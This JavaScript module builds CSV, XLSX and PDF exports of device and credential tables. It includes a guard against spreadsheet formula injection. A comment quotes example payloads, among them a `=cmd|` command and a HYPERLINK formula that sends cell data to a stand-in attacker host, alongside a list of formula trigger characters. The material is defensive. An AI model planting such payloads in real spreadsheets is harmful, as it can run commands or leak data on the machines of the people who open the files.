import ExcelJS from 'exceljs';
import jsPDF from 'jspdf';
import autoTable from 'jspdf-autotable';
import { formatDate } from './generic';
import { deviceTypes, deviceSubTypes } from './mappings';

const DATE_COLUMN_KEYS = new Set([
    'deviceAllocationDate',
    'deviceRevocationDate',
    'deviceLastAccess',
    'userCreationDate',
    'credValidityStart',
    'credValidityEnd',
    'deviceCreated',
    'deviceUpdated',
]);

const STATUS_COLUMN_KEYS = new Set([
    'status',
    'credStatus',
    'deviceStatus',
]);

const columnType = (key) => {
    if (DATE_COLUMN_KEYS.has(key)) return 'date';
    return 'string';
};

const translatedDeviceTypeLabel = (row, t) => {
    const mapping = {
        ...(deviceTypes[row.type] || {}),
        ...(deviceSubTypes[row.subType] || {}),
    };
    if (mapping.label) return t(mapping.label);
    return row.type || '';
};

const displayValueFor = (key, row, t) => {
    const raw = row?.[key];
    if (raw === null || raw === undefined) return '';

    if (STATUS_COLUMN_KEYS.has(key)) {
        const lower = String(raw).toLowerCase();
        return t(lower) || raw;
    }
    if (key === 'type') {
        return translatedDeviceTypeLabel(row, t);
    }
    if (DATE_COLUMN_KEYS.has(key)) {
        return formatDate(raw);
    }
    if (Array.isArray(raw)) {
        return raw.join(', ');
    }
    if (typeof raw === 'boolean') {
        return t(`hideColumns$boolType$${raw ? 'true' : 'false'}`);
    }
    return String(raw);
};

export const buildVisibleColumns = ({ orderedFieldKeys, activeDevicesColumns, t }) => {
    const keys = (orderedFieldKeys || []).filter(
        (k) => activeDevicesColumns && activeDevicesColumns[k] === true,
    );
    return keys.map((key) => ({
        key,
        label: t(`devicesTable$column$${key}`) || key,
        type: columnType(key),
        getDisplayValue: (row) => displayValueFor(key, row, t),
        getRawValue: (row) => row?.[key],
    }));
};

/**
 * Spreadsheet formula-injection guard (CWE-1236).
 *
 * Excel / Google Sheets evaluate a cell whose first character is one of these as
 * a formula. Exported columns carry user-settable free text (device nickname,
 * user, label, userId), so a low-privilege user can plant `=cmd|...` or
 * `=HYPERLINK("http://attacker/"&A1,...)` and have it execute on the machine of
 * the admin who opens the export. Every string cell written by the CSV and XLSX
 * writers goes through `neutralizeFormula` first.
 */
// Sourced from OWASP *CSV Injection* (community.owasp.org/attacks/CSV_Injection),
// which is a SUPERSET of the set PM-21661 AC1 enumerates: the AC omits line feed
// (0x0A) and the full-width variants. The standard outranks the ticket, so the
// standard's list is what ships — see `qa-plans/PM-21661/contradiction-report.md`.
const FORMULA_TRIGGER_CHARS = [
    '=', '+', '-', '@',
    '\t',                                   // 0x09 tab
    '\r',                                   // 0x0D carriage return
    '\n',                                   // 0x0A line feed   — NOT in AC1
    // ＝ ＋ － ＠ full-width variants — NOT in AC1. Treated as formula initiators
    // in some locales (e.g. Japanese environments). Written as \uFFxx escapes
    // rather than literals so the source survives non-UTF-8 tooling.
    '\uFF1D', '\uFF0B', '\uFF0D', '\uFF20',
];

export const neutralizeFormula = (value) => {
    const s = value === null || value === undefined ? '' : String(value);
    return FORMULA_TRIGGER_CHARS.includes(s.charAt(0)) ? `'${s}` : s;
};

// `;` is quoted as well as `,`: a European-locale Excel treats `;` as the list
// separator, so an unquoted `foo;=1+1` would split into a second cell that STARTS
// with `=` — the "dangerous character in the middle of the input, but at the
// beginning of a cell" bypass OWASP calls out explicitly. Quoting contains it.
const CSV_QUOTE_REQUIRED = /["\n\r,;]/;

const escapeCsvField = (value) => {
    // Neutralize first, then quote, so the guarding apostrophe sits inside the
    // CSV-quoted field and survives the round-trip into the spreadsheet.
    const s = neutralizeFormula(value);
    const escaped = s.replace(/"/g, '""');
    return CSV_QUOTE_REQUIRED.test(escaped) ? `"${escaped}"` : escaped;
};

const triggerBlobDownload = (blob, filename) => {
    const link = document.createElement('a');
    if (link.download === undefined) return;
    const url = URL.createObjectURL(blob);
    link.setAttribute('href', url);
    link.setAttribute('download', filename);
    link.style.visibility = 'hidden';
    document.body.appendChild(link);
    link.click();
    document.body.removeChild(link);
    URL.revokeObjectURL(url);
};

export const generateCsv = ({ rows, visibleColumns, filename }) => {
    if (!visibleColumns.length) return;
    const headerLine = visibleColumns
        .map((c) => escapeCsvField(c.label))
        .join(',');
    const bodyLines = (rows || []).map((row) =>
        visibleColumns.map((c) => escapeCsvField(c.getDisplayValue(row))).join(','),
    );
    const csvFile = `${[headerLine, ...bodyLines].join('\n')}\n`;
    const blob = new Blob([csvFile], { type: 'text/csv;charset=utf-8;' });
    triggerBlobDownload(blob, `${filename}.csv`);
};

const rawCellValueForXlsx = (column, row) => {
    if (column.type === 'date') {
        const raw = column.getRawValue(row);
        if (!raw) return null;
        const d = new Date(raw);
        return Number.isNaN(d.getTime()) ? column.getDisplayValue(row) : d;
    }
    if (column.type === 'number') {
        const raw = column.getRawValue(row);
        if (raw === null || raw === undefined || raw === '') return null;
        const n = Number(raw);
        return Number.isNaN(n) ? column.getDisplayValue(row) : n;
    }
    if (column.type === 'boolean') {
        const raw = column.getRawValue(row);
        if (typeof raw === 'boolean') return raw;
        return column.getDisplayValue(row);
    }
    return column.getDisplayValue(row);
};

// Dates, numbers and booleans are written as typed cells and are never parsed as
// a formula; only string cells need neutralizing.
const cellValueForXlsx = (column, row) => {
    const value = rawCellValueForXlsx(column, row);
    return typeof value === 'string' ? neutralizeFormula(value) : value;
};

export const generateXlsx = async ({ rows, visibleColumns, filename, reportMeta }) => {
    const workbook = new ExcelJS.Workbook();
    workbook.creator = reportMeta?.exportedBy || 'Axiad Portal';
    workbook.created = new Date();
    const sheetName = (reportMeta?.reportName || 'Report').slice(0, 31).replace(/[\\/?*[\]:]/g, '_');
    const worksheet = workbook.addWorksheet(sheetName);

    worksheet.columns = visibleColumns.map((c) => ({
        header: neutralizeFormula(c.label),
        key: c.key,
        width: Math.min(Math.max(c.label.length + 2, 12), 40),
    }));

    (rows || []).forEach((row) => {
        const rowValues = {};
        visibleColumns.forEach((c) => {
            rowValues[c.key] = cellValueForXlsx(c, row);
        });
        const addedRow = worksheet.addRow(rowValues);
        visibleColumns.forEach((c, idx) => {
            if (c.type === 'date') {
                addedRow.getCell(idx + 1).numFmt = 'yyyy-mm-dd hh:mm:ss';
            }
        });
    });

    const headerRow = worksheet.getRow(1);
    headerRow.font = { bold: true };
    worksheet.views = [{ state: 'frozen', ySplit: 1 }];
    if (visibleColumns.length > 0 && rows && rows.length > 0) {
        worksheet.autoFilter = {
            from: { row: 1, column: 1 },
            to: { row: 1, column: visibleColumns.length },
        };
    }

    const buffer = await workbook.xlsx.writeBuffer();
    const blob = new Blob([buffer], {
        type: 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
    });
    triggerBlobDownload(blob, `${filename}.xlsx`);
};

const FILTER_SUMMARY_MAX_LINES = 3;

const buildFilterLines = (currentSearchRules, t) => {
    if (!currentSearchRules || !currentSearchRules.length) return [];
    const valid = currentSearchRules.filter((r) => r.values && r.values.length && r.values[0]);
    return valid.map((r, i) => {
        const op = i === 0 ? '' : `${(t(`searchBar$mode$${r.logicalOperator}`) || r.logicalOperator || 'and').toUpperCase()} `;
        const name = t(`searchBar$keyword$${r.name}`) || r.name;
        const operation = t(`searchBar$operation$${r.operation}`) || r.operation;
        return `${op}${name} ${operation} "${r.values[0]}"`;
    });
};

// US Letter at 72pt per inch is 612 x 792. The table is drawn with PDF_MARGIN_PT
// on both sides (see the autoTable margin below), so the width actually available
// to the table is the page width less twice that margin.
//
// PM-21793: these were previously 540 and 760, both wider than the real printable
// area, so a table that was estimated to fit in fact overflowed the right margin.
export const PDF_MARGIN_PT = 40;
const LETTER_SHORT_EDGE_PT = 612;
const LETTER_LONG_EDGE_PT = 792;
export const PDF_PORTRAIT_PRINTABLE_PT = LETTER_SHORT_EDGE_PT - PDF_MARGIN_PT * 2; // 532
export const PDF_LANDSCAPE_PRINTABLE_PT = LETTER_LONG_EDGE_PT - PDF_MARGIN_PT * 2; // 712

export const PDF_FONT_SIZE_PT = 8;
// Helvetica's average advance is roughly half the font size, but the values that
// drive report width - serials, IDs, uppercase device types - are wider than
// average. 0.6em errs towards over-estimating, which at worst selects landscape
// for a table that would have fitted portrait. Under-estimating is the harmful
// direction: it keeps a wide table in portrait and forces heavy wrapping.
const CHAR_WIDTH_PT = PDF_FONT_SIZE_PT * 0.6;
const CELL_PADDING_PT = 12;

// Floor for any single column. A timestamp such as "2026-08-19 09:58:16" needs about
// 55pt at this font size once cell padding is allowed for, so 60pt keeps the date on
// its own line rather than one character per line. Measured against the real Active
// Certificates column set: eight columns at this floor still total exactly the 712pt
// landscape printable width, so nothing is pushed back off the page.
export const PDF_MIN_COLUMN_WIDTH_PT = 60;
const ORIENTATION_SAMPLE_ROWS = 200;

/**
 * Chooses page orientation from the table's natural width.
 *
 * PM-21793: the content length is no longer capped at 40 characters. A 64-character
 * device serial was counted as 40, so wide reports were judged to fit portrait when
 * they did not. Orientation no longer decides whether content is lost - the table is
 * fitted to the page either way - but picking the right one keeps wrapping down.
 */
export const estimatePdfOrientation = (visibleColumns, rows) => {
    const sample = (rows || []).slice(0, ORIENTATION_SAMPLE_ROWS);
    const widths = (visibleColumns || []).map((c) => {
        let maxChars = String(c.label ?? '').length;
        sample.forEach((row) => {
            const v = String(c.getDisplayValue(row) ?? '');
            if (v.length > maxChars) maxChars = v.length;
        });
        // The floor is part of the width a column will actually occupy, so the
        // estimate has to include it. Without this, nine narrow columns measured
        // ~30pt each and looked like they fitted portrait, while the floor made
        // them 540pt against a 532pt page - back to overflowing.
        return Math.max(
            PDF_MIN_COLUMN_WIDTH_PT,
            maxChars * CHAR_WIDTH_PT + CELL_PADDING_PT,
        );
    });
    const total = widths.reduce((a, b) => a + b, 0);
    const landscape = total > PDF_PORTRAIT_PRINTABLE_PT;

    return {
        orientation: landscape ? 'landscape' : 'portrait',
        widths,
        totalWidth: total,
        pageWidth: landscape ? PDF_LANDSCAPE_PRINTABLE_PT : PDF_PORTRAIT_PRINTABLE_PT,
    };
};

// PDF is deliberately exempt from `neutralizeFormula`: jsPDF/autoTable draw the
// value as literal glyphs, a PDF viewer has no formula engine, and prefixing an
// apostrophe would corrupt the rendered report for no security gain.
export const generatePdf = ({ rows, visibleColumns, filename, reportMeta, t }) => {
    const { orientation, pageWidth } = estimatePdfOrientation(visibleColumns, rows);
    const doc = new jsPDF({ orientation, unit: 'pt', format: 'letter' });

    // autoTable will not shrink a column below minCellWidth, so once the columns
    // outnumber the page the floor itself causes the overflow it was meant to avoid
    // (12 columns x 60pt = 720pt against a 712pt landscape page). Cap the floor at an
    // equal share of the page so a very wide report degrades to narrower-but-complete
    // rather than clipped. Landscape at this font size reaches that point at 12
    // columns; below it every column keeps the full 60pt.
    const columnCount = (visibleColumns || []).length;
    const effectiveMinCellWidth = columnCount > 0
        ? Math.min(PDF_MIN_COLUMN_WIDTH_PT, pageWidth / columnCount)
        : PDF_MIN_COLUMN_WIDTH_PT;

    const filterLines = buildFilterLines(reportMeta?.currentSearchRules, t);
    const filterPreview = filterLines.slice(0, FILTER_SUMMARY_MAX_LINES);
    const filterRemainder = filterLines.length - filterPreview.length;
    const generatedAt = new Date().toISOString().replace('T', ' ').slice(0, 19);

    const head = [visibleColumns.map((c) => c.label)];
    const body = (rows || []).map((row) =>
        visibleColumns.map((c) => c.getDisplayValue(row)),
    );

    const drawHeader = () => {
        const left = 40;
        let y = 30;
        doc.setFontSize(12);
        doc.setFont(undefined, 'bold');
        doc.text(reportMeta?.reportName || (t('modalLabels$exportReport$title') || 'Report'), left, y);
        y += 14;
        doc.setFont(undefined, 'normal');
        doc.setFontSize(9);
        doc.text(`${t('modalLabels$exportReport$pdfHeader$generated') || 'Generated'}: ${generatedAt}`, left, y);
        y += 11;
        if (reportMeta?.exportedBy) {
            doc.text(
                `${t('modalLabels$exportReport$pdfHeader$exportedBy') || 'Exported by'}: ${reportMeta.exportedBy}`,
                left,
                y,
            );
            y += 11;
        }
        if (typeof reportMeta?.totalRows === 'number') {
            doc.text(
                `${t('modalLabels$exportReport$pdfHeader$totalRows') || 'Total rows'}: ${reportMeta.totalRows}`,
                left,
                y,
            );
            y += 11;
        }
        if (filterPreview.length) {
            doc.text(`${t('modalLabels$exportReport$pdfHeader$filters') || 'Filters'}:`, left, y);
            y += 11;
            filterPreview.forEach((line) => {
                doc.text(`  ${line}`, left, y);
                y += 11;
            });
            if (filterRemainder > 0) {
                const moreTxt = (t('modalLabels$exportReport$pdfHeader$moreFilters', { count: filterRemainder })
                    || `…and ${filterRemainder} more filters`);
                doc.text(`  ${moreTxt}`, left, y);
                y += 11;
            }
        }
        return y + 6;
    };

    autoTable(doc, {
        head,
        body,
        startY: 140,
        margin: { top: 140, left: PDF_MARGIN_PT, right: PDF_MARGIN_PT, bottom: PDF_MARGIN_PT },
        // PM-21793: cellWidth must NOT be 'wrap'. With 'wrap', autoTable sets each
        // column's minWidth to its full content width, so the columns cannot be
        // reduced, the table stays wider than the page, and everything past the
        // right margin is clipped away - silently dropping columns and truncating
        // values. The default 'auto' gives each column a small minWidth, letting
        // autoTable size the table to `pageWidth - margins`, and 'linebreak' then
        // wraps long values onto extra lines instead of cutting them off.
        //
        // minCellWidth stops 'auto' going too far the other way. Width is shared out
        // in proportion to content, so next to a 40-character serial a date column
        // collapsed to autoTable's ~10pt floor and wrapped one or two characters per
        // line, which is unreadable. PDF_MIN_COLUMN_WIDTH_PT fits a date on one line;
        // the slack comes from the long columns, which wrap legibly regardless.
        styles: {
            overflow: 'linebreak',
            fontSize: PDF_FONT_SIZE_PT,
            minCellWidth: effectiveMinCellWidth,
        },
        headStyles: { fillColor: [70, 100, 165], textColor: 255, fontStyle: 'bold' },
        alternateRowStyles: { fillColor: [245, 247, 250] },
        didDrawPage: (data) => {
            drawHeader();
            const pageSize = doc.internal.pageSize;
            const pageHeight = pageSize.height ? pageSize.height : pageSize.getHeight();
            const pageWidth = pageSize.width ? pageSize.width : pageSize.getWidth();
            const currentPage = doc.internal.getCurrentPageInfo().pageNumber;
            const totalPages = doc.internal.getNumberOfPages();
            doc.setFontSize(8);
            doc.text(`${currentPage} / ${totalPages}`, pageWidth - 60, pageHeight - 20);
            data.settings.margin.top = 140;
        },
    });

    doc.save(`${filename}.pdf`);
};
